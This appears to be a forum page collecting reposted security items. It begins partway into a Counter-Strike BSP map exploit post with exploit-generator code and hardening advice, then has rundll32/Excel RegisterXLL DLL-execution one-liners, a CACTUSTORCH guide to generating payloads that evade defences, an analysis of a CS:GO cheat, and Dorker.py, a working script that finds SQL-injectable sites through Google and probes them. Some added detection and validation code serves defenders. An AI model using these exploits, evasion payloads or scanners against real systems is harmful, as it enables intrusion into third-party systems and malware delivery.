            sub_idx = j*4 + i*0xc
            data_idx = i*3 + j
            towrite = ""
            if data_idx >= len(data_buffer):
                towrite = "\x00"*4
            else:
                towrite = data_buffer[i*3 + j]
            mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
            #l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))

    # write out the corrupted file
    outfile = open(output_file, "wb")
    outfile.write(mmfile)
    outfile.close()

    l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
    l.info("Copy to game maps/ directory!")

if __name__ == "__main__":
    main()

As you can see, the exploit code is quite hardcoded to the map file.
The shellcode and ROP chain are stored in the LUMP_VERTICES section, and the LUMP_EDGES and LUMP_SURFEDGES are hijacked to get the function to read from an exact spot in the vertices lump. With more understanding of the BSP format combined with a parser, this exploit code would not have to guess offsets and it could just edit exact positions. Here’s the output when running the exploit:

{ cscz-bsp } > ./exploit.py
GoldSource .BSP file corruptor
  by @Digital_Cold

[+] Corrupting target file eip-minimized.bsp
[+] Writing to index buffer offset 0009e010...
[+] Vertex buffer indexes start 000a9174
[+] Vertex data at 00043f7c
[+] Wrote 2478632 byte exploit file to exploit-gen.bsp
[+] Copy to game maps/ directory!

Given that this vulnerability is now patched, it’s unlikely that this exploit will be of any use. Here is the exploit package that I sent Valve in my report. The shellcode and ROP chain are different, but the concept is the same.

Remote Exploitation

While developing this exploit I explored the idea of hosting it on a server. The only issue I ran into was getting the server itself to not crash when loading the map file. I came up with a possible method of hosting a malicious map file on a server. Due to the map crashing the server, what about not letting the server load the map? Instead have it load the legitimate map and then have the client download the map via HTTP as configured by the sv_downloadurl in your server.cfg. This variable was created to alleviate the slow download speeds when downloading directly from the Half-Life Dedicated Server (HLDS). Maps and other resources can be hosted directly under any HTTP server, such as nginx or apache, which will improve resource download speed. All we need the client to do is to start loading the map. At this point the vulnerability will be triggered and it won’t matter that the maps don’t match. Unfortunately map files are checksummed by the client and server (via CRC_MapFile).
During the initial server connection, the client will compare its map checksum to the server’s. If they don’t match, it will exit. I believe the approach to bypass this would be to modify the server binary to bypass or load a constant CRC value. I didn’t get this far, but I looked into it.

Half-Life Security Improvements

While developing the BSP exploit, I noted some key changes to the Half-Life GoldSrc Windows build process that would hamper future vulnerability impact and exploit development ease:

- Ensure that ASLR is enabled for hl.exe, steamclient.dll, and filesystem_stdio.dll.
  Impact: This will limit the number of fixed address ROP gadgets available to attackers without a corresponding ASLR break via memory leak.
  Fix: Add /DYNAMICBASE to linker flags.
- Enable SafeSEH for all loaded modules (hl.exe and filesystem_stdio.dll are missing it).
  Fix: Add /SAFESEH to linker flags.
  Impact: This will limit the use of Structured Exception Handler (SEH) exploits (which for this bug was possible due to unlimited stack overflow, leading to the corruption of on-stack exception handler function pointers).
- Enable stack cookies.
  Impact: Enabling stack cookies protects large, on-stack buffers, which is most likely common in the GoldSrc engine. Future buffer overflows would become more difficult to exploit with this mitigation enabled. For the function with the buffer overflow, the usage of stack cookies (or canaries) would have prevented the straightforward saved return address hijack.
  Fix: Add /GS (guard stack) to compiler flags.

Hopefully Valve takes my build environment modifications into consideration, as it’s the cheapest and most effective way to improve the overall security posture of GoldSrc and other engines.

On Shared Code Vulnerabilities

After some digging, I found the source code for the vulnerable function, GL_SubdivideSurface. This function is a part of the original Quake engine and has been inherited by every derivative engine since its open source release! Who knows how many engines out there use this function internally.

Thoughts and Future Work

Finding bugs in Counter Strike was quite the process. Detailing it all out in writing makes me appreciate how many little details went into the whole process. This endeavor was primarily a learning experience for me and my first disclosure of a vulnerability. I certainly look forward to finding more interesting bugs and creating even more sophisticated exploits in the future. Follow me on twitter @Digital_Cold to keep up-to-date with any other interesting bugs or targets I run across, or comment down below if you have any questions.

Special thanks to TobalJackson for proofreading this article.

Source: https://hernan.de/blog/2017/07/07/lock-and-load-exploiting-counter-strike-via-bsp-map-files/
1 point
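The two crashes above both start with a lump header the engine trusts: Mod_LoadTextures dereferences mod_base + l->fileofs and reads nummiptex without checking either against the file, and GL_SubdivideSurface copies a fuzzer-controlled vec3Count of vertices into a fixed VEC3DATA array. As an added example, not code from the post or from the engine, here is a small Python checker that performs the lump-directory bounds checks the engine skips, so a corrupted map can be rejected (or a fuzzer crash triaged) before anything is dereferenced. It assumes the standard GoldSrc v30 layout (a 32-bit version followed by 15 lump_t entries of {int fileofs; int filelen}, textures at lump index 2); the map buffers it builds are constructed samples, not real maps.

```python
import struct

# Layout assumptions for a GoldSrc (Half-Life 1) v30 BSP: a 32-bit version
# followed by 15 lump_t entries of {int fileofs; int filelen}.
BSP_VERSION_30 = 30
HEADER_LUMPS = 15
LUMP_TEXTURES = 2          # index of the textures lump (assumed standard order)
HEADER_SIZE = 4 + 8 * HEADER_LUMPS


def parse_header(data):
    """Return (version, [(fileofs, filelen), ...]) from a raw BSP buffer."""
    if len(data) < HEADER_SIZE:
        raise ValueError("buffer shorter than a BSP header (%d bytes)" % len(data))
    version = struct.unpack_from("<i", data, 0)[0]
    lumps = [struct.unpack_from("<ii", data, 4 + 8 * i) for i in range(HEADER_LUMPS)]
    return version, lumps


def validate_bsp(data):
    """Return a list of problems found in the lump directory; empty means it is sane.

    These are the checks Mod_LoadTextures does not make before dereferencing
    mod_base + l->fileofs: every lump must lie inside the file, and the texture
    lump's nummiptex (first int of dmiptexlump_t) plus its int32 offset table
    must fit inside that lump.
    """
    problems = []
    version, lumps = parse_header(data)
    if version != BSP_VERSION_30:
        problems.append("unexpected BSP version %d" % version)
    size = len(data)
    for i, (ofs, ln) in enumerate(lumps):
        if ofs < 0 or ln < 0:
            problems.append("lump %d: negative fileofs/filelen (%d, %d)" % (i, ofs, ln))
        elif ofs + ln > size:   # Python ints do not wrap, so this also catches 32-bit overflow
            problems.append("lump %d: extends past end of file (%d + %d > %d)" % (i, ofs, ln, size))
    ofs, ln = lumps[LUMP_TEXTURES]
    tex_ok = not any(p.startswith("lump %d:" % LUMP_TEXTURES) for p in problems)
    if ln and tex_ok:
        if ln < 4:
            problems.append("texture lump of %d bytes cannot hold nummiptex" % ln)
        else:
            nummiptex = struct.unpack_from("<i", data, ofs)[0]
            if nummiptex < 0 or 4 + 4 * nummiptex > ln:
                problems.append("nummiptex %d does not fit in a %d-byte texture lump" % (nummiptex, ln))
    return problems


def build_bsp(lump_payloads, version=BSP_VERSION_30):
    """Construct a minimal BSP buffer from {lump_index: bytes}; sample data, not a real map."""
    body = b""
    entries = []
    for i in range(HEADER_LUMPS):
        payload = lump_payloads.get(i, b"")
        entries.append((HEADER_SIZE + len(body), len(payload)))
        body += payload
    header = struct.pack("<i", version) + b"".join(struct.pack("<ii", o, n) for o, n in entries)
    return header + body


def corrupt_lump(data, index, fileofs=None, filelen=None):
    """Copy data with one lump_t entry overwritten, the kind of change the fuzzer made."""
    at = 4 + 8 * index
    ofs, ln = struct.unpack_from("<ii", data, at)
    if fileofs is not None:
        ofs = fileofs
    if filelen is not None:
        ln = filelen
    return data[:at] + struct.pack("<ii", ofs, ln) + data[at + 8:]


if __name__ == "__main__":
    # Texture lump: nummiptex = 1 followed by one int32 offset.
    good = build_bsp({LUMP_TEXTURES: struct.pack("<ii", 1, 8), 3: b"\x00" * 12})
    print("clean file:", validate_bsp(good) or "ok")
    print("bad fileofs:", validate_bsp(corrupt_lump(good, LUMP_TEXTURES, fileofs=0x7fffffff)))
    print("bad nummiptex:", validate_bsp(build_bsp({LUMP_TEXTURES: struct.pack("<i", 0x7fffffff)})))
```

The same per-lump test (offset and length inside the file, per-lump element counts inside the lump) is what an 010 Editor template or a fuzz-triage script should apply to every lump before trusting it; the vertex, edge and surfedge lumps the exploit hijacks would get an element-count check in the same way.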
-
Execute DLL via the Excel.Application object's RegisterXLL() method

BAT

REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();

JS

// Create Instance of Excel.Application COM object
var excel = new ActiveXObject("Excel.Application");
// Pass in path to the DLL (can use any extension)
excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");

Powershell

# Create Instance of Excel.Application COM object
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
# Pass in path to the DLL (can use any extension)
$excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")

Source: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
1 point
-
Payload Generation with CACTUSTORCH

10/07/2017 | Author: Admin

CACTUSTORCH is a framework for payload generation that can be used in adversary simulation engagements, based on James Forshaw’s DotNetToJScript tool. This tool allows C# binaries to be bootstrapped inside a payload, providing reliable means to bypass many common defences.

Currently CACTUSTORCH supports the following payload types:

- VBS
- VBA
- JS
- JSE
- WSF
- HTA
- VBE

Prior to this, it was not possible to invoke shellcode injection directly from multiple formats, with the exclusion of VBA macros (more on this later in the post). CACTUSTORCH has a self-contained C# binary which accepts a binary name and base64 encoded shellcode to inject. Additionally, it borrows concepts from @armitagehacker / CobaltStrike’s VBA macro injection whereby it selects the 32 bit executable to inject into.

State of Current Payloads

Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated. In Metasploit framework the following payload formats work as such:

- VBS: File drop and execute – Touches disk.
- HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team.
- VBA-EXE: File drop and execute – Touches disk.
- VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning.
- VBA-PSH: Runs powershell.exe with a Shell object – Powershell.exe is well known to blue team.

In CobaltStrike, the following payload formats work as such:

- VBS: Weakens the target, creates a COM object to Excel, creates worksheet, injects VBA macro code and executes – Relies on Office being installed and Kernel32 API declarations in injected VBA.
- VBA: Shellcode injection by declaring Kernel32 API – Known indicators for Maldoc scanning.
- HTA-EXE: File drop and execute – Touches disk.
- HTA-PSH: Runs powershell.exe with a WScript.Shell object – Powershell.exe and WScript.Shell are well known to blue team.
- HTA-VBA: Wraps around a VBS that does the weakening, COM object to Excel, macro injection of Kernel32 API declaration VBA code.

Benefits of CACTUSTORCH

CACTUSTORCH offers a number of improvements on current payload generation that are currently beyond the capabilities of the public frameworks:

- Does not use Kernel32 API declarations in the payload.
- Obfuscated within the C# binary.
- Allows for arbitrary specification of target binary to spawn.
- Allows for arbitrary shellcode to be specified.
- Does not spawn PowerShell.exe.
- Does not require Powershell.
- Does not require Office.
- Does not invoke WScript.Shell.
- Does not require staging as the full stageless shellcode can be contained within the delivered payload.
- No static parent to child spawn; the user can change what wscript.exe spawns. Wscript.exe spawning Powershell.exe is suspicious; spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries.

Using CACTUSTORCH

Using CACTUSTORCH is relatively straightforward; the following outlines the steps required to generate a custom payload:

1. Select the payload format you want to use from the cloned directory.
2. Select a binary container you want to inject into; it has to exist in both SYSWOW64 and SYSTEM32.
3. Generate raw shellcode for your listener:
   $> cat payload.bin | base64 -w 0 > out.txt
4. Copy the out.txt base64 raw payload into the “code” variable of the template.
5. If doing it for the VBA, run the out.txt through vbasplit.py out.txt split.txt.
6. Then copy the split.txt into the code section highlighted in the VBA template.
7. Payload is ready.
8. Do obfuscation if you want.

A video demonstrating these steps is shown below:

Integration with Cobalt Strike

As part of the process for streamlining adversary simulation engagements so that more time can be placed into creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to facilitate this. After loading the aggressor script, the following menu is presented as an option under the “Attack” tab. You can now select the payloads you want to use and options; it will generate the payload and host it for you. In terms of the VBA code, it will be presented in a textbox where it can be copied from and pasted into a Word VBA Macro. The aggressor script is demonstrated in the following video:

Credits

The scripts, proof of concepts and aggressor script addon are created by Vincent Yiu of the ActiveBreach team. We would like to also thank the following people for their contributions:

- @tiraniddo: James Forshaw for DotNet2Jscript
- @cn33liz: Inspiration with StarFighters
- @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
- @_RastaMouse: Testing and giving recommendations around README

CACTUSTORCH can be downloaded from the MDSec ActiveBreach github page.

Source: https://www.mdsec.co.uk/2017/07/payload-generation-with-cactustorch/
1 point
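Both of the preceding posts spell out what a defender has to look for in process telemetry: the RegisterXLL gist runs rundll32.exe with a javascript: argument that calls RegisterXLL on a COM-activated Excel, and the CACTUSTORCH write-up notes that the only fixed parent-child relationship left is wscript.exe (or another script host) spawning whichever system binary receives the shellcode. As an added example serving both posts, and not code from either project, here is Python triage logic that applies those four indicators to process-creation events. The event records and their field names (parent, image, cmdline) are constructed samples in the shape Sysmon event 1 or an EDR process log provides; the rule names, severities and the list of spawn targets are assumptions.

```python
import re

# Constructed process-creation events (not real telemetry). Event 2 carries the
# one-liner from the RegisterXLL gist; event 1 is the script-host-to-rundll32
# spawn the CACTUSTORCH post describes.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Bob\Downloads\invoice.js"},
    {"parent": "wscript.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe"},
    {"parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": (r'rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";'
                 r"x=new%20ActiveXObject('Excel.Application');"
                 r"x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();")},
    {"parent": "svchost.exe", "image": "excel.exe",
     "cmdline": "excel.exe /automation -Embedding"},
    {"parent": "explorer.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Containers the CACTUSTORCH post names for the injected shellcode, plus the
# shell the older payload styles launch (assumed list; extend to taste).
SPAWN_TARGETS = {"rundll32.exe", "regsvr32.exe", "calc.exe", "ping.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_javascript_rundll32(ev):
    # rundll32 given a javascript: URL is the mshtml RunHTMLApplication trick.
    return ev["image"] == "rundll32.exe" and re.search(r"\bjavascript:", ev["cmdline"], re.I) is not None


def rule_register_xll(ev):
    # Catches the one-liner form only; the JS and PowerShell forms keep the call
    # inside a file, which needs script-block or file-content telemetry instead.
    return re.search(r"RegisterXLL\s*\(", ev["cmdline"], re.I) is not None


def rule_script_host_spawn(ev):
    return ev["parent"] in SCRIPT_HOSTS and ev["image"] in SPAWN_TARGETS


def rule_com_excel(ev):
    # COM activation starts Excel with -Embedding under the DCOM launcher rather
    # than the user's shell; weak on its own, so it is reported as "info".
    return (ev["image"] == "excel.exe" and "-embedding" in ev["cmdline"].lower()
            and ev["parent"] != "explorer.exe")


RULES = [
    ("rundll32 javascript: one-liner (mshtml RunHTMLApplication)", "high", rule_javascript_rundll32),
    ("Excel.Application RegisterXLL on a command line", "high", rule_register_xll),
    ("script host spawning an injection-friendly system binary", "medium", rule_script_host_spawn),
    ("Excel activated through COM outside the user's shell", "info", rule_com_excel),
]


def triage(events):
    """Return one hit per (event, rule) match: {"event": index, "rule": name, "severity": level}."""
    hits = []
    for idx, raw in enumerate(events):
        ev = {"parent": basename(raw["parent"]), "image": basename(raw["image"]),
              "cmdline": raw["cmdline"]}
        for name, severity, pred in RULES:
            if pred(ev):
                hits.append({"event": idx, "rule": name, "severity": severity})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print("%-6s event %d: %s" % (h["severity"], h["event"], h["rule"]))
```

Run over the samples, the benign wscript.exe launch and the control-panel rundll32.exe produce nothing, the one-liner fires two high-severity rules, and the script-host spawn is caught by the parent-child rule even though its command line is empty, which is the whole point of watching the relationship rather than the arguments.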
-
Reverse engineering a CS:GO cheating software

TL;DR: Technical low-level analysis of the cheat, also including the licensing and differences between public and private version.

CS:GO is one of the most popular competitive online games; it has 520.285 current players as I write these lines. As in any other competition-driven game, cheaters arise, and especially in the CS community they have become a serious problem. Today we are taking a look at the public and private version of a cheat for this game!

I won't mention the name of the cheat to avoid giving them free advertisement and because it's not necessary for this post, but if you're into this topic, you'll probably guess.

Before we start, it's important to mention that I managed to get a private version build using an alternative channel 😈. This means I've never paid the developer, so I didn't support their business in any way! Damn you, cheaters!

Public vs Private version

This cheat is quite accessible, as the developer provides a public (free) version with all the capabilities for the users to try. The most important "downside" is that the public cheat is obviously detected by VAC, so if you use it in a VAC-protected server, it's a matter of time until your account gets VAC-banned. Here is where the paid private version comes into play: customers get a unique build that is guaranteed to be undetected.

Licensing

Each private version build of the cheat is tied to a machine, to avoid piracy, reselling, etc. The license procedure gets the SystemDrive environment variable and, using DeviceIoControl with the parameter IOCTL_DISK_GET_DRIVE_GEOMETRY, reads the technical capabilities of the hard drive. Then the Processor Brand String is also read using the cpuid instruction. This information is formatted into a string, hashed with SHA1, and mutated with a custom ASCII rotation algorithm:

for ( i = 0; i < v16; v16 = strlen((const char *)&sha1_hex) )
{
  v18 = *((char *)&sha1_hex + i);
  if ( (unsigned int)(v18 - '0') > 9 )
    *((_BYTE *)&sha1_hex + i) = v18 + 5;
  else
    *((_BYTE *)&sha1_hex + i) = v18 + '!';
  ++i;
}

The resulting string is your unique license, which is sent to the cheat developer when you buy it, and in return you get a build that only works in the computer that generated this license.

How the cheat works

This cheat is an external cheat, which means all the work is done outside of the CS:GO process (no DLL injection). The first thing it does is open the csgo.exe process and get the base addresses of client.dll and engine.dll. Then it uses patterns to find game structures (offsets) in memory; these patterns usually match opcodes of the game binaries where memory pointers are referenced, or other useful information. They also use patterns to find game functions and strings. For example, one of the patterns is:

89 0D ? ? ? ? 8B 0D ? ? ? ? 8B F2 8B C1 83 CE 08

If we look for these bytes in the client.dll file, we get the following hit:

0x102bdf1d      890de815f214   mov dword [0x14f215e8], ecx
0x102bdf23      8b0d5ccaec12   mov ecx, dword [0x12ecca5c]
0x102bdf29      8bf2           mov esi, edx
0x102bdf2b      8bc1           mov eax, ecx
0x102bdf2d      83ce08         or esi, 8

Which means this pattern is looking for one of those global memory references present in the first two disassembly lines.

As we said, they also use patterns to locate game functions; for instance, with the following pattern the cheat locates the start of the function used by the game to execute console commands in-game:

55 8B EC 8B ? ? ? ? ? 81 F9 ? ? ? ? 75 0C A1 ? ? ? ? 35 ? ? ? ? EB 05 8B 01 FF 50 34 50 A1

This one is found in engine.dll:

            0x100aa300      55             push ebp
            0x100aa301      8bec           mov ebp, esp
            0x100aa303      8b0d54345b10   mov ecx, dword [0x105b3454]
            0x100aa309      81f938345b10   cmp ecx, 0x105b3438
        ,=< 0x100aa30f      750c           jne 0x100aa31d
        |   0x100aa311      a168345b10     mov eax, dword [0x105b3468]
        |   0x100aa316      3538345b10     xor eax, 0x105b3438
       ,==< 0x100aa31b      eb05           jmp 0x100aa322
       |`-> 0x100aa31d      8b01           mov eax, dword [ecx]
       |    0x100aa31f      ff5034         call dword [eax + 0x34]
       `--> 0x100aa322      50             push eax
            0x100aa323      a1f8325a10     mov eax, dword [0x105a32f8]
            [...]

If the cheat wants to run an in-game console command, it can allocate memory in the game process, pass the arguments to the function using this memory, and create a new thread using CreateRemoteThread at the beginning of the procedure.

When the cheat has located all it needs to work, it will start a bunch of threads that implement each of the functionalities. These threads are in charge of monitoring and manipulating the game memory using the functions ReadProcessMemory and WriteProcessMemory. By changing the values of the internal game structures at will, the cheat can achieve the functionalities it offers.
I have identified some of the functions and renamed them in my pseudocode: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)aimassist, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)aimlock, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)bunnyhop, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)anti_flash, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_403F0E, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)esp_hack, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)radar_hack, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)kill_message, 0, 0, 0); while ( !byte_4F1081 || !byte_4F1054 || !byte_4F1082 || !byte_4F10C9 || !byte_4F1062 || !byte_4F1040 || !byte_4F1090 || !byte_4F1028 ) Sleep(0x64u); // Default config cfg_antiflash = 1; cfg_aimlock = 1; cfg_killmessage = 1; cfg_radarhack = 1; byte_4F1032 = 0; cfg_glowesp = 1; byte_4F10C0 = 0; cfg_bunnyhop = 1; cfg_aimassist = 1; cfg_reload(); while ( WaitForSingleObject(csgo_prochandler, 0) != 0 ) cfg_changes_loop(); CloseHandle(csgo_prochandler); j_exit(0); Private version protection The public version is poorly protected, they just encrypted the strings with a simple algorithm but it has no code obfuscation or PE packing. On the other side, the private version is protected with Themida, a commercial packer that, depending on its configuration, can be quite effective protecting executables. It's very likely that they use Themida for two purposes: Protect the cheat license from being patched. The program can be manipulated to validate any license when running in a computer, but reconstruct a fully working version of the packed executable and patch it may be quite tricky. The second and most important, avoid the VAC signatures from detecting their cheat when running. Themida can protect the original opcodes of the program when it's loaded in memory and running, and writing signatures (patterns) for those opcodes is one of the methods VAC uses to detect cheaters. 
Closing If we compare it to other cheats, this one is simple in terms of functionality, but still quite effective. Bear in mind that the CSGO binaries used for the analysis are not from the latest game update, as I wrote this one week ago. The binaries I used are: 942fa5d3ef9e0328157b34666327461cee10aae74b26af135b8589dc35a5abc7 client.dll e6f3eda5877f2584aeb43122a85d0861946c7fb4222d0cb6f3bc30034e4d3e24 engine.dll 1a5bb2b0ae9f2e6ef757c834eeb2c360a59dce274b2e4137706031f629e6455f csgo.exe This means that the cheat signatures may have been slightly modified to work with the new executables, and the offsets probably won't be the same if these binaries changed in the latest version of the game. Sursa: https://blog.badtrace.com/post/reverse-engineering-a-csgo-cheat/1 point
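The byte-pattern scanning described in the post above (a signature with `?` wildcards, and the referenced global address pulled out of the hit) is the same mechanism that signature-based detectors such as the VAC opcode scans the post mentions rely on. The following is an added example, not code from the post or from the cheat it analyses: a small signature scanner in Python, run over sample buffers constructed from the instruction bytes the post shows. The padding bytes around those instructions, the `CLIENT_BASE` constant (chosen so the hit lands at the address the post lists) and all function names are assumptions.

```python
"""Signature (byte-pattern) scanner with '?' wildcards.

Added example; not code from the blog post or the cheat it analyses.
The sample buffers are constructed from the instruction encodings shown
in the post; padding bytes and the base address are made up.
"""
import re
import struct
from typing import List, Optional, Tuple


def compile_pattern(pattern: str):
    """Compile a signature such as "89 0D ? ? ? ? 8B 0D" into a bytes regex.
    Each '?' (or '??') stands for exactly one arbitrary byte. The body is
    wrapped in a lookahead so overlapping hits are all reported."""
    parts = []
    for tok in pattern.split():
        if tok in ("?", "??"):
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"(?=" + b"".join(parts) + b")", re.DOTALL)


def scan(image: bytes, pattern: str) -> List[int]:
    """Every offset in `image` at which `pattern` matches."""
    return [m.start() for m in compile_pattern(pattern).finditer(image)]


def find_unique(image: bytes, pattern: str) -> Optional[int]:
    """Offset of the single hit, or None when the signature is absent or
    ambiguous. A pattern that matches more than once is not a usable
    signature, so it is rejected rather than silently taking the first hit."""
    hits = scan(image, pattern)
    return hits[0] if len(hits) == 1 else None


def read_dword(image: bytes, offset: int) -> int:
    """Little-endian 32-bit operand read from the matched instruction bytes."""
    return struct.unpack_from("<I", image, offset)[0]


# Constructed sample: the five client.dll instruction encodings from the post,
# padded with NOP / INT3 bytes so the hit is not at offset 0. CLIENT_BASE is an
# assumption picked so that the hit lands at the VA the post shows, 0x102bdf1d.
CLIENT_SAMPLE = (
    b"\x90" * 0x10
    + bytes.fromhex("890de815f214" "8b0d5ccaec12" "8bf2" "8bc1" "83ce08")
    + b"\xcc" * 8
)
CLIENT_BASE = 0x102bdf1d - 0x10
CLIENT_PATTERN = "89 0D ? ? ? ? 8B 0D ? ? ? ? 8B F2 8B C1 83 CE 08"

# Constructed sample: the engine.dll prologue bytes from the post, padded.
ENGINE_SAMPLE = b"\xcc" * 4 + bytes.fromhex(
    "55" "8bec" "8b0d54345b10" "81f938345b10" "750c" "a168345b10"
    "3538345b10" "eb05" "8b01" "ff5034" "50" "a1f8325a10"
)
ENGINE_PATTERN = ("55 8B EC 8B ? ? ? ? ? 81 F9 ? ? ? ? 75 0C A1 ? ? ? ? "
                  "35 ? ? ? ? EB 05 8B 01 FF 50 34 50 A1")


def resolve_client_globals(image: bytes = CLIENT_SAMPLE,
                           base: int = CLIENT_BASE) -> Optional[Tuple[int, int, int]]:
    """Locate the client.dll signature and extract the two globals referenced
    by `mov dword [imm32], ecx` (imm32 at +2) and `mov ecx, dword [imm32]`
    (imm32 at +8). Returns (hit_va, first_global, second_global) or None."""
    off = find_unique(image, CLIENT_PATTERN)
    if off is None:
        return None
    return (base + off, read_dword(image, off + 2), read_dword(image, off + 8))


if __name__ == "__main__":
    print("client.dll hit: va=%#x globals=%#x %#x" % resolve_client_globals())
    print("engine.dll hit at offset", find_unique(ENGINE_SAMPLE, ENGINE_PATTERN))
```

The `find_unique` check is the part worth copying: a signature that hits twice after a game update is exactly the situation the post's closing paragraph warns about, and a scanner that takes the first hit will read a wrong pointer without any error.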
-
1. Get rid of other services that consume resources.
2. Use only nginx + php-fpm.
3. Use PHP opcache with as long a revalidation period as possible.
4. Upgrade to MariaDB 10.1 and optimize what you have there.
5. Optimize the images on your server as well as the caching of static resources. Also check the Cloudflare settings regarding these.
6. New browsers support HTTP/2 and that could increase performance (test it).
7. If your CMS supports caching, enable it. Try to use memcached/redis for caching; file cache usually does not perform as well.
1 point
-
I had another idea. When someone successfully finishes a challenge, instead of the congratulation or "success" message, wouldn't it be better for them to receive 5, 10 or 20 euros?
1 point
-
Dorker.py - A SQL Injection Dork Scanner

    #!/usr/bin/python
    ## Dorker.py
    ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
    ## Author: Xinapse
    ## Website: http://www.iexploit.org
    ## Email: iexploittube@gmail.com
    ## Twitter: #iExploitXinapse
    ## Version 0.0.1
    ## Usage dorker.py [options]

    from xgoogle.search import GoogleSearch, SearchError
    import time, urllib2, optparse

    print '''
     ________                __
     \______ \   ___________|  | __ ____ _______
      |    |  \ /  _ \_  __ \  |/ /_/ __ \\_  __ \
      |    `   (  <_> )  | \/    <  \  ___/ |  | \/
     /_______  /\____/|__|   |__|_ \  \___  >|__|
             \/                   \/     \/
    ---------------------------------------------------------------------------------
    --  dorker.py                                                                  --
    --  SQL Dork finder script                                                     --
    --  Author: Xinapse                                                            --
    --  Website: http://www.iexploit.org                                           --
    --  Email: iexploittube@gmail.com                                              --
    --  Twitter: #iExploitXinapse                                                  --
    --  Version 0.0.1                                                              --
    --  Usage dorker.py [options]                                                  --
    ---------------------------------------------------------------------------------
    '''

    parser = optparse.OptionParser()
    options = optparse.OptionGroup(parser, 'Options')
    parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')
    parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')
    parser.add_option('-v', '--verbose', action="store_true", dest="verbose", default=False, help="Adds extra status messages showing program execution")
    parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')
    (opts, args) = parser.parse_args()

    urlno = 0
    invuln = 0

    if opts.dork:
        dork = opts.dork
    else:
        print '>> Please enter a dork'
    if opts.file:
        filename = opts.file
    else:
        print '>> Please enter a filename'
    if opts.verbose:
        verbose = 'true'
    else:
        verbose = 'false'
    if opts.evasion:
        evas = opts.evasion
    else:
        evas = 10

    pagecount = 0
    counter = 0

    try:
        pagecount = pagecount + 1
        if verbose == 'true':
            print '>> Crawling google page ' + str(pagecount) + '...'
        search = GoogleSearch(dork)
        while True:
            search.results_per_page = 100
            tmp = search.get_results()
            if not tmp:
                break
            if verbose == 'true':
                print '>> No more results...'
            for t in tmp:
                try:
                    url = t.url.encode("utf8")
                    if verbose == 'true':
                        print '>> Testing ' + url + ' for vulnerabilities...'
                    testurl = url + "'"
                    req = urllib2.urlopen(testurl)
                    data = req.read()
                    if "sql" in data or "SQL" in data or "MySQL" in data or "MYSQL" in data or "MSSQL" in data:
                        f = open(filename, "a")
                        if verbose == 'true':
                            print ">> Found possible injection in " + url
                        f.write(testurl + "\n")
                        f.close()
                        counter = counter + 1
                    else:
                        invuln = invuln + 1
                except:
                    errors = 1
            if verbose == 'true':
                print '>> Sleeping to bypass google flood protection...'
            time.sleep(evas)
    except SearchError, e:
        print ">> Search failed: %s" % e

    print '>> Dorker scan ended'
    print '>> ' + str(counter) + ' vulnerable sites found'
    print '>> ' + str(invuln) + ' sites not vulnerable'
    print '>> Thank you for using Dorker, output has been saved to ' + filename

Download xgoogle library: https://github.com/pkrumins/xgoogle
1 point